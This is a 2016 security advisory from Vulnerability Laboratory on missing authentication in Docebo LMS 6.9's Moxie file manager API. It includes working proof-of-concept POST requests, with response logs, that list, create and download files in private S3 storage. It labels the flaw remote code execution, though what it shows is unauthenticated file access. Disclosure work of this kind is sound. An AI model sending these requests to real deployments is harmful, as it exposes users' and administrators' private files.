Document Title: =============== Docebo LMS 6.9 - (Moxie) API Calls RST Remote Code Execution Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1888 Video: http://www.vulnerability-lab.com/get_content.php?id=1892 Release Date: ============= 2016-08-02 Vulnerability Laboratory ID (VL-ID): ==================================== 1888 Common Vulnerability Scoring System: ==================================== 7.3 Product & Service Introduction: =============================== Docebo is a SAAS/Cloud platform for e-learning, also known as a learning management system.From the Latin word, docere. Docebo is used for corporate learning and has interfaces for videoconferencing and HR systems. Using an online system for learning and training cuts down time needed and costs that would be used on such things as printing and distributing materials. (Copy of the Vendor Homepage: https://www.docebo.com/learning-management-system-lms/ & https://en.wikipedia.org/wiki/DoceboLMS ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a remote code execution vulnerability in the official Docebo LMS 6.9 web-application. Vulnerability Disclosure Timeline: ================================== 2016-07-01: Researcher Notification & Coordination (Lawrence Amer) 2016-07-02: Vendor Notification (LMS Security Team) 2016-**-**: Vendor Response/Feedback (LMS Security Team) 2016-**-**: Vendor Fix/Patch (LMS Service Developer Team) 2016-08-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Docebo Product: Docebo LMS - Content Management System (Web-Application) 6.9 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ API calls REST auth Vulnerability has been discovered in the official Docebo LMS web-application. Remote attackers with low user privilege are able to send Json Api request through Moxie file manager api without secure authentication rules, the vulnerability is located in the module `../moxiemanager/api.php`. User with low privileged access rights are able to send REST calls through vulnerable module to do many actions allowed by the current module `moxie`. The vulnerable parameters `action,json` allow remote attackers to execute Commands `Create,List,Download,view`. Due to our investigation we discovered that moxie file manager is included in the whole functionality of Docebo LMS as materials uploader, used only by admins to customize files, images and to manage them. 1.1 Attackers are able to retrieve list of filenames, paths of files uploaded by Docebo admins and others users even it is private data, the vulenrable module moxie allows remote attackers to gain access to S3 package which responsible for storing users, admin images, files and other sensitive data. 1.2 Remote attackers are able to create files and folders names inside the S3 package of cloudfront account without approval or secure authentication. 1.3 Attackers are able to download files uploaded by administrators or other users through api rst function called "download". Files are downloadable from cloudfront s3 account without secure authentication. Vulnerable Module(s): [+]/moxiemanager/api.php Vulnerable parameter(s): [+]json [+]action Request Method(s): [+] POST Request Type(s): [+] Json Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without user interaction or privileged web-application user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1. Remote attackers can send REST calls through any REST console, by following the instruction below: #1 URL : http://docebosaas.localhost:8080/moxiemanager/api.php Request type : POST Content header : application/x-www-form-urlencoded Encoding : gzip RAW Body : json=%7B%22id%22%3A%22i1%22%2C%22method%22%3A%22listFiles%22%2C%22params%22%3A%7B%22path%22%3A%22%2FS3%22%2C%22filter %22%3A%22%22%2C%22orderBy%22%3A%22name%22%2C%22desc%22%3Afalse%2C%22offset%22%3A0%2C%22length%22%3A200%2C%22lastPath%22%3Anull%7D%2C%22jsonrpc%22%3A%222.0%22%7D --- POC LOGS --- Content-Type: application/x-www-form-urlencoded Accept: */* Connection: keep-alive Origin: chrome-extension: //rest-console-id User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 Request Url: https://vulnlab.docebosaas.com/moxiemanager/api.php Request Method: POST Status Code: 200 Params: {} --- RESPONSE LOGS --- { "jsonrpc": "2.0", "result": { "columns": ["name", "size", "modified", "attrs", "info"], "config": { "general.hidden_tools": "", "general.disabled_tools": "", "filesystem.extensions": "jpg,jpeg,png,gif", "filesystem.force_directory_template": false, "upload.maxsize": "100MB", "upload.chunk_size": "5mb", "upload.extensions": "*", "createdoc.templates": "", "createdoc.fields": "Document title=title", "createdir.templates": "" }, "file": { "path": "/S3", "size": 0, "lastModified": 1469569618, "isFile": false, "canRead": true, "canWrite": true, "canEdit": false, "canRename": true, "canView": false, "canPreview": false, "exists": true, "meta": { "url": "https://d36spl5w3z9i0o.cloudfront.net/files/v/u/vulnlab_docebosaas_com/userfiles/13013/13013" } }, "urlFile": null, "data": [ ["lawrenc", 0, 0, "drwr----", {}], ["lawrence", 0, 0, "drwr----", {}], ["lawrenceamer", 0, 0, "drwr----", {}] ], "url": "https://d36spl5w3z9i0o.cloudfront.net/files/v/u/vulnlab_docebosaas_com/userfiles/13013/13013", "thumbnailFolder": false, "thumbnailPrefix": false, "offset": 3, "last": true }, "id": "i1" } #2 1. Remote attackers can send REST calls through any REST console, by following the instruction below: URL : http://docebosaas.localhost:8080/moxiemanager/api.php Request type : POST Content header : application/x-www-form-urlencoded Encoding : gzip RAW Body : json=%7B%22id%22%3A%22i9%22%2C%22method%22%3A%22createDirectory%22%2C%22params%22%3A%7B%22path%22%3A%22%2FS3%2Fvulnlab%22%7D%2C%22jsonrpc%22%3A%222.0%22%7D --- POCS LOGS --- Content-Type: application/x-www-form-urlencoded Accept: */* Connection: keep-alive Origin: chrome-extension: //rest-console-id User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 Request Url: https://vulnlab.docebosaas.com/moxiemanager/api.php Request Method: POST Status Code: 200 Params: {} --- RESPONSE LOGS --- { "jsonrpc": "2.0", "result": { "path": "/S3/vulnlab", "size": 0, "lastModified": 0, "isFile": false, "canRead": true, "canWrite": true, "canEdit": false, "canRename": true, "canView": false, "canPreview": false, "exists": true, "meta": { "url": "https://d36spl5w3z9i0o.cloudfront.net/files/v/u/vulnlab_docebosaas_com/userfiles/13013/vulnlab" } }, "id": "i9" } #3 1. Remote attacker with low user privileges can use the link below to get files uploaded into S3 package as zip downloadable package. URL: https://docebosaas.localhost:8080/moxiemanager/api.php?action=download&path=/S3&names=NAMEOFIFLE.jpg&zipname=files.zip 2. successfully reproduce the issue . PoC: Video https://www.youtube.com/watch?v=YF57jTPESgQ Security Risk: ============== The security risk of the remote code execution vulnerability in the api calls function of the web-application is estimated as high. (CVSS 7.3) Credits & Authors: ================== Core Research Team - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. Copyright A(c) 2016 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com